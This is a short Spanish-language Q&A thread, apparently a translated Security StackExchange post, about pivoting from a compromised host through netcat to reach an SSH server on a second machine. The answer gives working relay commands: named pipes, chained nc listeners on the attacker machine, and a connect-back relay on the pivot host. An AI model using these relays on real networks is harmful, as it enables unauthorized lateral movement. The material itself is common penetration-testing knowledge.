Usa netcat para Pivot

2

Así que tengo un shell en la máquina A que no tiene ssh instalado y no puedo obtener un shell tty (he probado todas las hojas de trucos tty, creo que esto es intencional)

A través de la máquina A puedo ver la máquina B que tiene un servidor ssh ejecutándose en el puerto 2222.

Lo que me gustaría hacer es averiguar cómo usar netcat para conectarse a ssh manualmente o usar netcat para pasar de mi máquina atacante a la máquina A a la máquina B.

Primero probé nc -lvp 444 -c 'nc machine.b 2222' pero no puedo enlazar a la Máquina A, supongo que las reglas de firewall.

A continuación, intenté reenviar la conexión a mi máquina atacante nc attacking.machine 444 -c 'nc machine.b 2222' , que funciona, pero me di cuenta de que una vez que se reenvía a mi máquina atacante, no puedo acceder al puerto para conectarme con ssh.

Este es el diseño de la red ... creo

    
pregunta Anthony Russell 04.07.2018 - 02:52
fuente

1 respuesta

3

Bueno, entonces la respuesta es usar un relé netcat. Encontré esta hoja de trucos de Sans que tiene algunos comandos excelentes nc . También obtuve algo de sabiduría sabia de @BetterSafteyNet que me llevó al PDF. Con sus poderes combinados se me ocurrió la siguiente serie de comandos para hacer que esto funcione.

Usando el diagrama que originalmente publiqué como una leyenda:

Primero configure el relé de oyente en la máquina atacante

~$ cd /tmp; mknod backpipe p
~$ nc -lvp <listen port 1> 0<backpipe | nc -lvp <listen port 2> | tee backpipe

A continuación, configure la retransmisión cliente a cliente en la Máquina A (la máquina dinámica)

~$cd /tmp; mknod backpipe p 
~$nc <machine b ip> <ssh port> 0<backpipe | nc <attack machine ip> <listening port 1> | tee backpipe   

Finalmente haga la conexión SSH desde la máquina atacante

~$ssh [email protected] -p <listen port 2>
    
respondido por el Anthony Russell 06.07.2018 - 01:09
fuente

Lea otras preguntas en las etiquetas